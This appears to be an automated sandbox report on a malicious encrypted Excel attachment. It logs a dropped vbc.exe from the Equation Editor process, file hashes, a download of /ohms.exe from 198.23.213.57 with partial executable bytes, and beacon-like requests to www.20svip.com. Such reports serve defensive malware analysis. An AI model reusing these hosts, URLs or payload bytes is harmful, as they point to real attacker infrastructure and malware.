                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..._.2...............P......L........... ... ....@.. ....................................@.....................................O.... ..,H..........................h................................................ ............... ..H............text........ ...................... ..`.rsrc...,H... ...J..................@..@.reloc...............4..............@..B........................H.......................P................................................0............(....(..........(.....o.....*.....................( ......(!......("......(#......($....*N..(....oU...(%....*&..(&....*.s'........s(........s)........s*........s+........*....0...........~....o,....+..*.0...........~....o-....+..*.0...........~....o.....+..*.0...........~....o/....+..*.0...........~....o0....+..*&..(1....*...0..<........~.....(2.....,!r...p.....(3...o4...s5............~.....
                                            C:\Users\user\Desktop\~$Refno.191938.xlsx
                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):330
                                            Entropy (8bit):1.4377382811115937
                                            Encrypted:false
                                            SSDEEP:3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
                                            MD5:96114D75E30EBD26B572C1FC83D1D02E
                                            SHA1:A44EEBDA5EB09862AC46346227F06F8CFAF19407
                                            SHA-256:0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
                                            SHA-512:52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
                                            Malicious:true
                                            Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                            C:\Users\Public\vbc.exe
                                            Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                            Category:dropped
                                            Size (bytes):734720
                                            Entropy (8bit):7.525234190780704
                                            Encrypted:false
                                            SSDEEP:12288:OxIvnbBjqfKMpnc2FOAeqL6oPUxMnHIqKG6BcmKd4pC+sO6cHksc5w3sLj19nFY:OVHUxCHIqKG6Bw5yTc5yo19nF
                                            MD5:BA01DF16E4C876E078348FD4479A8FDF
                                            SHA1:6C7F20976D3E7D9BF9F8A410CBC54962D1EF52BB
                                            SHA-256:8353E30C6566795DA3E5AA38A22B4707EE895CFA115FFA399CFBE7D57D00F91D
                                            SHA-512:7D828277F9DFD39755B015CB25EE713159C2CF9D812EA938B408E0C21B9004B72D9EFA21DEF95DFA307838DB56558FD8E507AD10B887E1ED7CA1219A53E8747C
                                            Malicious:true
                                            Antivirus:
                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..._.2...............P......L........... ... ....@.. ....................................@.....................................O.... ..,H..........................h................................................ ............... ..H............text........ ...................... ..`.rsrc...,H... ...J..................@..@.reloc...............4..............@..B........................H.......................P................................................0............(....(..........(.....o.....*.....................( ......(!......("......(#......($....*N..(....oU...(%....*&..(&....*.s'........s(........s)........s*........s+........*....0...........~....o,....+..*.0...........~....o-....+..*.0...........~....o.....+..*.0...........~....o/....+..*.0...........~....o0....+..*&..(1....*...0..<........~.....(2.....,!r...p.....(3...o4...s5............~.....

                                            Static File Info

                                            General

                                            File type:CDFV2 Encrypted
                                            Entropy (8bit):7.984133724091837
                                            TrID:
                                            • Generic OLE2 / Multistream Compound File (8008/1) 100.00%
                                            File name:Refno.191938.xlsx
                                            File size:326656
                                            MD5:a6ea0794f2791f9f2bdfcdb467122e6b
                                            SHA1:83815a1977485c3fabdd49c91926d0482e3b78e1
                                            SHA256:db692f9512b08149089a9d7295a04633f22944d87f2bfe53ae00d2c55f7502ca
                                            SHA512:8e9d56848c8e9dc03676348ebc0b57b650cfe4a8c61d1d8825b68e7989f29eb83509e9a1d5d35fcdf9e81e1ddcd8ed6a80d7a947e5906965f9d42f89f7d6fc6d
                                            SSDEEP:6144:Nc2M/OhbVZxxJBrH0z4IeLiR2sWxIyEazPO8ZH88w5a5GCvVWoiNa6LwnxTaM4sL:6PAVhJd07eLgiK0PO8588wDCh+aPxWcL
                                            File Content Preview:........................>.......................................................................|..............................................................................................................................................................

                                            File Icon

                                            Icon Hash:e4e2aa8aa4b4bcb4

                                            Static OLE Info

                                            General

                                            Document Type:OLE
                                            Number of OLE Files:1

                                            OLE File "Refno.191938.xlsx"

                                            Indicators

                                            Has Summary Info:False
                                            Application Name:unknown
                                            Encrypted Document:True
                                            Contains Word Document Stream:False
                                            Contains Workbook/Book Stream:False
                                            Contains PowerPoint Document Stream:False
                                            Contains Visio Document Stream:False
                                            Contains ObjectPool Stream:
                                            Flash Objects Count:
                                            Contains VBA Macros:False

                                            Streams

                                            Stream Path: \x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace, File Type: data, Stream Size: 64
                                            General
                                            Stream Path:\x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace
                                            File Type:data
                                            Stream Size:64
                                            Entropy:2.73637206947
                                            Base64 Encoded:False
                                            Data ASCII:. . . . . . . . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . .
                                            Data Raw:08 00 00 00 01 00 00 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 54 00 72 00 61 00 6e 00 73 00 66 00 6f 00 72 00 6d 00 00 00
                                            Stream Path: \x6DataSpaces/DataSpaceMap, File Type: data, Stream Size: 112
                                            General
                                            Stream Path:\x6DataSpaces/DataSpaceMap
                                            File Type:data
                                            Stream Size:112
                                            Entropy:2.7597816111
                                            Base64 Encoded:False
                                            Data ASCII:. . . . . . . . h . . . . . . . . . . . . . . E . n . c . r . y . p . t . e . d . P . a . c . k . a . g . e . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . D . a . t . a . S . p . a . c . e . . .
                                            Data Raw:08 00 00 00 01 00 00 00 68 00 00 00 01 00 00 00 00 00 00 00 20 00 00 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 65 00 64 00 50 00 61 00 63 00 6b 00 61 00 67 00 65 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 00 00
                                            Stream Path: \x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary, File Type: data, Stream Size: 200
                                            General
                                            Stream Path:\x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary
                                            File Type:data
                                            Stream Size:200
                                            Entropy:3.13335930328
                                            Base64 Encoded:False
                                            Data ASCII:X . . . . . . . L . . . { . F . F . 9 . A . 3 . F . 0 . 3 . - . 5 . 6 . E . F . - . 4 . 6 . 1 . 3 . - . B . D . D . 5 . - . 5 . A . 4 . 1 . C . 1 . D . 0 . 7 . 2 . 4 . 6 . } . N . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                            Data Raw:58 00 00 00 01 00 00 00 4c 00 00 00 7b 00 46 00 46 00 39 00 41 00 33 00 46 00 30 00 33 00 2d 00 35 00 36 00 45 00 46 00 2d 00 34 00 36 00 31 00 33 00 2d 00 42 00 44 00 44 00 35 00 2d 00 35 00 41 00 34 00 31 00 43 00 31 00 44 00 30 00 37 00 32 00 34 00 36 00 7d 00 4e 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00
                                            Stream Path: \x6DataSpaces/Version, File Type: data, Stream Size: 76
                                            General
                                            Stream Path:\x6DataSpaces/Version
                                            File Type:data
                                            Stream Size:76
                                            Entropy:2.79079600998
                                            Base64 Encoded:False
                                            Data ASCII:< . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . D . a . t . a . S . p . a . c . e . s . . . . . . . . . . . . .
                                            Data Raw:3c 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00 72 00 2e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 73 00 01 00 00 00 01 00 00 00 01 00 00 00
                                            Stream Path: EncryptedPackage, File Type: data, Stream Size: 319688
                                            General
                                            Stream Path:EncryptedPackage
                                            File Type:data
                                            Stream Size:319688
                                            Entropy:7.99921088827
                                            Base64 Encoded:True
                                            Data ASCII:. . . . . . . . . % . . . . 9 . . . ^ . F s P . . . . . " . . . . . . . . . . . 3 . . . . . . i _ . R . h . . . . . . . . . . . . . S . . . . . . y w a . q . M . . d . u f h . . y w a . q . M . . d . u f h . . y w a . q . M . . d . u f h . . y w a . q . M . . d . u f h . . y w a . q . M . . d . u f h . . y w a . q . M . . d . u f h . . y w a . q . M . . d . u f h . . y w a . q . M . . d . u f h . . y w a . q . M . . d . u f h . . y w a . q . M . . d . u f h . . y w a . q . M . . d . u f h . . y w a . q . M
                                            Data Raw:c0 e0 04 00 00 00 00 00 e0 25 84 bd f8 ac 39 ae d3 95 5e c0 46 73 50 1b e1 ad f1 e4 22 e7 0d 83 b4 99 cf a6 e7 82 19 fb 33 cf b4 b5 1a 03 9c 69 5f 9e 52 00 68 f9 9b ae e5 df f4 ae aa 0d 85 b5 ed 13 53 ef 05 0e 99 ed b9 79 77 61 82 71 fb 4d d2 b3 64 05 75 66 68 dc b9 79 77 61 82 71 fb 4d d2 b3 64 05 75 66 68 dc b9 79 77 61 82 71 fb 4d d2 b3 64 05 75 66 68 dc b9 79 77 61 82 71 fb 4d
                                            Stream Path: EncryptionInfo, File Type: data, Stream Size: 224
                                            General
                                            Stream Path:EncryptionInfo
                                            File Type:data
                                            Stream Size:224
                                            Entropy:4.59742097095
                                            Base64 Encoded:False
                                            Data ASCII:. . . . $ . . . . . . . $ . . . . . . . . f . . . . . . . . . . . . . . . . . . . . . . M . i . c . r . o . s . o . f . t . . E . n . h . a . n . c . e . d . . R . S . A . . a . n . d . . A . E . S . . C . r . y . p . t . o . g . r . a . p . h . i . c . . P . r . o . v . i . d . e . r . . . . . . . . . 3 . I . G . . . * . . . . . . . . . . . . . . . 9 . L . & . . . . . . . . . . . ! . . 0 . . . ) . . = . . . . . . . . . . . . 2 _ .
                                            Data Raw:04 00 02 00 24 00 00 00 8c 00 00 00 24 00 00 00 00 00 00 00 0e 66 00 00 04 80 00 00 80 00 00 00 18 00 00 00 00 00 00 00 00 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 20 00 45 00 6e 00 68 00 61 00 6e 00 63 00 65 00 64 00 20 00 52 00 53 00 41 00 20 00 61 00 6e 00 64 00 20 00 41 00 45 00 53 00 20 00 43 00 72 00 79 00 70 00 74 00 6f 00 67 00 72 00 61 00 70 00 68 00

                                            Network Behavior

                                            Snort IDS Alerts

                                            TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                            05/04/21-16:40:51.173911TCP3132WEB-CLIENT PNG large image width download attempt8049165198.23.213.57192.168.2.22

                                            Network Port Distribution

                                            TCP Packets

                                            TimestampSource PortDest PortSource IPDest IP
                                            May 4, 2021 16:40:50.081424952 CEST4916580192.168.2.22198.23.213.57
                                            May 4, 2021 16:40:50.219065905 CEST8049165198.23.213.57192.168.2.22
                                            May 4, 2021 16:40:50.219173908 CEST4916580192.168.2.22198.23.213.57
                                            May 4, 2021 16:40:50.219563007 CEST4916580192.168.2.22198.23.213.57
                                            May 4, 2021 16:40:50.357841015 CEST8049165198.23.213.57192.168.2.22
                                            May 4, 2021 16:40:50.357873917 CEST8049165198.23.213.57192.168.2.22
                                            May 4, 2021 16:40:50.357889891 CEST8049165198.23.213.57192.168.2.22
                                            May 4, 2021 16:40:50.357908964 CEST8049165198.23.213.57192.168.2.22
                                            May 4, 2021 16:40:50.357918024 CEST4916580192.168.2.22198.23.213.57
                                            May 4, 2021 16:40:50.357948065 CEST4916580192.168.2.22198.23.213.57
                                            May 4, 2021 16:40:50.357950926 CEST4916580192.168.2.22198.23.213.57
                                            May 4, 2021 16:40:50.493119001 CEST8049165198.23.213.57192.168.2.22
                                            May 4, 2021 16:40:50.493146896 CEST8049165198.23.213.57192.168.2.22
                                            May 4, 2021 16:40:50.493159056 CEST8049165198.23.213.57192.168.2.22
                                            May 4, 2021 16:40:50.493175030 CEST8049165198.23.213.57192.168.2.22
                                            May 4, 2021 16:40:50.493191004 CEST8049165198.23.213.57192.168.2.22
                                            May 4, 2021 16:40:50.493207932 CEST8049165198.23.213.57192.168.2.22
                                            May 4, 2021 16:40:50.493223906 CEST8049165198.23.213.57192.168.2.22
                                            May 4, 2021 16:40:50.493240118 CEST8049165198.23.213.57192.168.2.22
                                            May 4, 2021 16:40:50.493294001 CEST4916580192.168.2.22198.23.213.57
                                            May 4, 2021 16:40:50.497241974 CEST4916580192.168.2.22198.23.213.57
                                            May 4, 2021 16:40:50.629834890 CEST8049165198.23.213.57192.168.2.22
                                            May 4, 2021 16:40:50.629865885 CEST8049165198.23.213.57192.168.2.22
                                            May 4, 2021 16:40:50.629878044 CEST8049165198.23.213.57192.168.2.22
                                            May 4, 2021 16:40:50.629893064 CEST8049165198.23.213.57192.168.2.22
                                            May 4, 2021 16:40:50.629914045 CEST8049165198.23.213.57192.168.2.22
                                            May 4, 2021 16:40:50.629931927 CEST8049165198.23.213.57192.168.2.22
                                            May 4, 2021 16:40:50.629946947 CEST8049165198.23.213.57192.168.2.22
                                            May 4, 2021 16:40:50.629964113 CEST8049165198.23.213.57192.168.2.22
                                            May 4, 2021 16:40:50.630022049 CEST4916580192.168.2.22198.23.213.57
                                            May 4, 2021 16:40:50.630038023 CEST4916580192.168.2.22198.23.213.57
                                            May 4, 2021 16:40:50.634799957 CEST8049165198.23.213.57192.168.2.22
                                            May 4, 2021 16:40:50.634826899 CEST8049165198.23.213.57192.168.2.22
                                            May 4, 2021 16:40:50.634848118 CEST8049165198.23.213.57192.168.2.22
                                            May 4, 2021 16:40:50.634864092 CEST4916580192.168.2.22198.23.213.57
                                            May 4, 2021 16:40:50.634870052 CEST8049165198.23.213.57192.168.2.22
                                            May 4, 2021 16:40:50.634876013 CEST4916580192.168.2.22198.23.213.57
                                            May 4, 2021 16:40:50.634888887 CEST4916580192.168.2.22198.23.213.57
                                            May 4, 2021 16:40:50.634895086 CEST8049165198.23.213.57192.168.2.22
                                            May 4, 2021 16:40:50.634902954 CEST4916580192.168.2.22198.23.213.57
                                            May 4, 2021 16:40:50.634917974 CEST8049165198.23.213.57192.168.2.22
                                            May 4, 2021 16:40:50.634931087 CEST4916580192.168.2.22198.23.213.57
                                            May 4, 2021 16:40:50.634941101 CEST8049165198.23.213.57192.168.2.22
                                            May 4, 2021 16:40:50.634952068 CEST4916580192.168.2.22198.23.213.57
                                            May 4, 2021 16:40:50.634964943 CEST8049165198.23.213.57192.168.2.22
                                            May 4, 2021 16:40:50.634974957 CEST4916580192.168.2.22198.23.213.57
                                            May 4, 2021 16:40:50.634999990 CEST4916580192.168.2.22198.23.213.57
                                            May 4, 2021 16:40:50.635679960 CEST4916580192.168.2.22198.23.213.57
                                            May 4, 2021 16:40:50.765265942 CEST8049165198.23.213.57192.168.2.22
                                            May 4, 2021 16:40:50.765302896 CEST8049165198.23.213.57192.168.2.22
                                            May 4, 2021 16:40:50.765320063 CEST8049165198.23.213.57192.168.2.22
                                            May 4, 2021 16:40:50.765336037 CEST8049165198.23.213.57192.168.2.22
                                            May 4, 2021 16:40:50.765356064 CEST8049165198.23.213.57192.168.2.22
                                            May 4, 2021 16:40:50.765376091 CEST8049165198.23.213.57192.168.2.22
                                            May 4, 2021 16:40:50.765419006 CEST8049165198.23.213.57192.168.2.22
                                            May 4, 2021 16:40:50.765444994 CEST8049165198.23.213.57192.168.2.22
                                            May 4, 2021 16:40:50.765458107 CEST4916580192.168.2.22198.23.213.57
                                            May 4, 2021 16:40:50.765466928 CEST8049165198.23.213.57192.168.2.22
                                            May 4, 2021 16:40:50.765480042 CEST4916580192.168.2.22198.23.213.57
                                            May 4, 2021 16:40:50.765482903 CEST4916580192.168.2.22198.23.213.57
                                            May 4, 2021 16:40:50.765485048 CEST4916580192.168.2.22198.23.213.57
                                            May 4, 2021 16:40:50.765489101 CEST8049165198.23.213.57192.168.2.22
                                            May 4, 2021 16:40:50.765505075 CEST8049165198.23.213.57192.168.2.22
                                            May 4, 2021 16:40:50.765523911 CEST4916580192.168.2.22198.23.213.57
                                            May 4, 2021 16:40:50.765527964 CEST8049165198.23.213.57192.168.2.22
                                            May 4, 2021 16:40:50.765542984 CEST4916580192.168.2.22198.23.213.57
                                            May 4, 2021 16:40:50.765548944 CEST8049165198.23.213.57192.168.2.22
                                            May 4, 2021 16:40:50.765563965 CEST4916580192.168.2.22198.23.213.57
                                            May 4, 2021 16:40:50.765568018 CEST4916580192.168.2.22198.23.213.57
                                            May 4, 2021 16:40:50.765571117 CEST8049165198.23.213.57192.168.2.22
                                            May 4, 2021 16:40:50.765590906 CEST8049165198.23.213.57192.168.2.22
                                            May 4, 2021 16:40:50.765599966 CEST4916580192.168.2.22198.23.213.57
                                            May 4, 2021 16:40:50.765615940 CEST8049165198.23.213.57192.168.2.22
                                            May 4, 2021 16:40:50.765619993 CEST4916580192.168.2.22198.23.213.57
                                            May 4, 2021 16:40:50.765625000 CEST4916580192.168.2.22198.23.213.57
                                            May 4, 2021 16:40:50.765650988 CEST4916580192.168.2.22198.23.213.57
                                            May 4, 2021 16:40:50.768045902 CEST4916580192.168.2.22198.23.213.57
                                            May 4, 2021 16:40:50.770067930 CEST8049165198.23.213.57192.168.2.22
                                            May 4, 2021 16:40:50.770104885 CEST8049165198.23.213.57192.168.2.22
                                            May 4, 2021 16:40:50.770136118 CEST8049165198.23.213.57192.168.2.22
                                            May 4, 2021 16:40:50.770162106 CEST8049165198.23.213.57192.168.2.22
                                            May 4, 2021 16:40:50.770175934 CEST4916580192.168.2.22198.23.213.57
                                            May 4, 2021 16:40:50.770188093 CEST8049165198.23.213.57192.168.2.22
                                            May 4, 2021 16:40:50.770195007 CEST4916580192.168.2.22198.23.213.57
                                            May 4, 2021 16:40:50.770198107 CEST4916580192.168.2.22198.23.213.57
                                            May 4, 2021 16:40:50.770215988 CEST8049165198.23.213.57192.168.2.22
                                            May 4, 2021 16:40:50.770229101 CEST4916580192.168.2.22198.23.213.57
                                            May 4, 2021 16:40:50.770245075 CEST8049165198.23.213.57192.168.2.22
                                            May 4, 2021 16:40:50.770256996 CEST4916580192.168.2.22198.23.213.57
                                            May 4, 2021 16:40:50.770272970 CEST8049165198.23.213.57192.168.2.22
                                            May 4, 2021 16:40:50.770291090 CEST4916580192.168.2.22198.23.213.57
                                            May 4, 2021 16:40:50.770299911 CEST8049165198.23.213.57192.168.2.22
                                            May 4, 2021 16:40:50.770315886 CEST4916580192.168.2.22198.23.213.57
                                            May 4, 2021 16:40:50.770333052 CEST8049165198.23.213.57192.168.2.22
                                            May 4, 2021 16:40:50.770345926 CEST4916580192.168.2.22198.23.213.57
                                            May 4, 2021 16:40:50.770361900 CEST8049165198.23.213.57192.168.2.22
                                            May 4, 2021 16:40:50.770378113 CEST4916580192.168.2.22198.23.213.57
                                            May 4, 2021 16:40:50.770389080 CEST8049165198.23.213.57192.168.2.22
                                            May 4, 2021 16:40:50.770405054 CEST4916580192.168.2.22198.23.213.57
                                            May 4, 2021 16:40:50.770415068 CEST8049165198.23.213.57192.168.2.22

                                            UDP Packets

                                            TimestampSource PortDest PortSource IPDest IP
                                            May 4, 2021 16:41:55.059818983 CEST5219753192.168.2.228.8.8.8
                                            May 4, 2021 16:41:55.130595922 CEST53521978.8.8.8192.168.2.22
                                            May 4, 2021 16:42:14.700201035 CEST5309953192.168.2.228.8.8.8
                                            May 4, 2021 16:42:14.779922009 CEST53530998.8.8.8192.168.2.22
                                            May 4, 2021 16:42:34.995629072 CEST5283853192.168.2.228.8.8.8
                                            May 4, 2021 16:42:35.070686102 CEST53528388.8.8.8192.168.2.22

                                            DNS Queries

                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                            May 4, 2021 16:41:55.059818983 CEST192.168.2.228.8.8.80xa14dStandard query (0)www.20svip.comA (IP address)IN (0x0001)
                                            May 4, 2021 16:42:14.700201035 CEST192.168.2.228.8.8.80xccffStandard query (0)www.pistonpounder.comA (IP address)IN (0x0001)
                                            May 4, 2021 16:42:34.995629072 CEST192.168.2.228.8.8.80x2e78Standard query (0)www.streamxvid.comA (IP address)IN (0x0001)

                                            DNS Answers

                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                            May 4, 2021 16:41:55.130595922 CEST8.8.8.8192.168.2.220xa14dNo error (0)www.20svip.com20svip.comCNAME (Canonical name)IN (0x0001)
                                            May 4, 2021 16:41:55.130595922 CEST8.8.8.8192.168.2.220xa14dNo error (0)20svip.com43.226.23.112A (IP address)IN (0x0001)
                                            May 4, 2021 16:42:14.779922009 CEST8.8.8.8192.168.2.220xccffName error (3)www.pistonpounder.comnonenoneA (IP address)IN (0x0001)
                                            May 4, 2021 16:42:35.070686102 CEST8.8.8.8192.168.2.220x2e78No error (0)www.streamxvid.com178.33.233.22A (IP address)IN (0x0001)

                                            HTTP Request Dependency Graph

                                            • 198.23.213.57
                                            • www.20svip.com

                                            HTTP Packets

                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            0192.168.2.2249165198.23.213.5780C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                            TimestampkBytes transferredDirectionData
                                            May 4, 2021 16:40:50.219563007 CEST0OUTGET /ohms.exe HTTP/1.1
                                            Accept: */*
                                            Accept-Encoding: gzip, deflate
                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                            Host: 198.23.213.57
                                            Connection: Keep-Alive
                                            May 4, 2021 16:40:50.357841015 CEST1INHTTP/1.1 200 OK
                                            Date: Tue, 04 May 2021 14:40:50 GMT
                                            Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/7.3.27
                                            Last-Modified: Tue, 04 May 2021 13:26:38 GMT
                                            ETag: "b3600-5c18107215abc"
                                            Accept-Ranges: bytes
                                            Content-Length: 734720
                                            Keep-Alive: timeout=5, max=100
                                            Connection: Keep-Alive
                                            Content-Type: application/x-msdownload
                                            Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 5f 96 32 da 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 50 00 00 e8 0a 00 00 4c 00 00 00 00 00 00 d6 06 0b 00 00 20 00 00 00 20 0b 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 a0 0b 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 84 06 0b 00 4f 00 00 00 00 20 0b 00 2c 48 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 0b 00 0c 00 00 00 68 06 0b 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 dc e6 0a 00 00 20 00 00 00 e8 0a 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 2c 48 00 00 00 20 0b 00 00 4a 00 00 00 ea 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 80 0b 00 00 02 00 00 00 34 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 06 0b 00 00 00 00 00 48 00 00 00 02 00 05 00 8c f7 00 00 c4 1c 01 00 03 00 00 00 01 00 00 06 50 14 02 00 18 f2 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1b 30 02 00 1f 00 00 00 00 00 00 00 00 00 28 1d 00 00 0a 28 1e 00 00 0a 00 de 02 00 dc 00 28 07 00 00 06 02 6f 1f 00 00 0a 00 2a 00 01 10 00 00 02 00 01 00 0e 0f 00 02 00 00 00 00 aa 00 02 16 28 20 00 00 0a 00 02 16 28 21 00 00 0a 00 02 17 28 22 00 00 0a 00 02 17 28 23 00 00 0a 00 02 16 28 24 00 00 0a 00 2a 4e 00 02 28 09 00 00 06 6f 55 02 00 06 28 25 00 00 0a 00 2a 26 00 02 28 26 00 00 0a 00 2a ce 73 27 00 00 0a 80 01 00 00 04 73 28 00 00 0a 80 02 00 00 04 73 29 00 00 0a 80 03 00 00 04 73 2a 00 00 0a 80 04 00 00 04 73 2b 00 00 0a 80 05 00 00 04 2a 00 00 00 13 30 01 00 10 00 00 00 01 00 00 11 00 7e 01 00 00 04 6f 2c 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 02 00 00 11 00 7e 02 00 00 04 6f 2d 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 03 00 00 11 00 7e 03 00 00 04 6f 2e 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 04 00 00 11 00 7e 04 00 00 04 6f 2f 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 05 00 00 11 00 7e 05 00 00 04 6f 30 00 00 0a 0a 2b 00 06 2a 26 00 02 28 31 00 00 0a 00 2a 00 00 13 30 02 00 3c 00 00 00 06 00 00 11 00 7e 06 00 00 04 14 28 32 00 00 0a 0b 07 2c 21 72 01 00 00 70 d0 05 00 00 02 28 33 00 00 0a 6f 34 00 00 0a 73 35 00 00 0a 0c 08 80 06 00 00 04 00 00 7e 06 00 00 04 0a 2b 00 06 2a 13 30 01 00
                                            Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL_2PL @ @O ,Hh H.text `.rsrc,H J@@.reloc4@BHP0(((o*( (!("(#($*N(oU(%*&(&*s's(s)s*s+*0~o,+*0~o-+*0~o.+*0~o/+*0~o0+*&(1*0<~(2,!rp(3o4s5~+*0


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            1192.168.2.224916643.226.23.11280C:\Windows\explorer.exe
                                            TimestampkBytes transferredDirectionData
                                            May 4, 2021 16:41:55.450345993 CEST774OUTGET /op9s/?K6AhK=ON6d4TF&2dl=WVpgvCfCKFxjsYGtekiOGQyeBTiHa9iswHtNMSjSk0aOhTAJ8ULc9AeWVXTq4zeX0h/y8A== HTTP/1.1
                                            Host: www.20svip.com
                                            Connection: close
                                            Data Raw: 00 00 00 00 00 00 00
                                            Data Ascii:
                                            May 4, 2021 16:41:56.283168077 CEST774OUTGET /op9s/?K6AhK=ON6d4TF&2dl=WVpgvCfCKFxjsYGtekiOGQyeBTiHa9iswHtNMSjSk0aOhTAJ8ULc9AeWVXTq4zeX0h/y8A== HTTP/1.1
                                            Host: www.20svip.com
                                            Connection: close
                                            Data Raw: 00 00 00 00 00 00 00
                                            Data Ascii:
                                            May 4, 2021 16:41:57.968192101 CEST774OUTGET /op9s/?K6AhK=ON6d4TF&2dl=WVpgvCfCKFxjsYGtekiOGQyeBTiHa9iswHtNMSjSk0aOhTAJ8ULc9AeWVXTq4zeX0h/y8A== HTTP/1.1
                                            Host: www.20svip.com
                                            Connection: close
                                            Data Raw: 00 00 00 00 00 00 00
                                            Data Ascii:
                                            May 4, 2021 16:42:01.338042021 CEST774OUTGET /op9s/?K6AhK=ON6d4TF&2dl=WVpgvCfCKFxjsYGtekiOGQyeBTiHa9iswHtNMSjSk0aOhTAJ8ULc9AeWVXTq4zeX0h/y8A== HTTP/1.1
                                            Host: www.20svip.com
                                            Connection: close
                                            Data Raw: 00 00 00 00 00 00 00
                                            Data Ascii:
                                            May 4, 2021 16:42:04.709716082 CEST774OUTGET /op9s/?K6AhK=ON6d4TF&2dl=WVpgvCfCKFxjsYGtekiOGQyeBTiHa9iswHtNMSjSk0aOhTAJ8ULc9AeWVXTq4zeX0h/y8A== HTTP/1.1
                                            Host: www.20svip.com
                                            Connection: close
                                            Data Raw: 00 00 00 00 00 00 00
                                            Data Ascii:
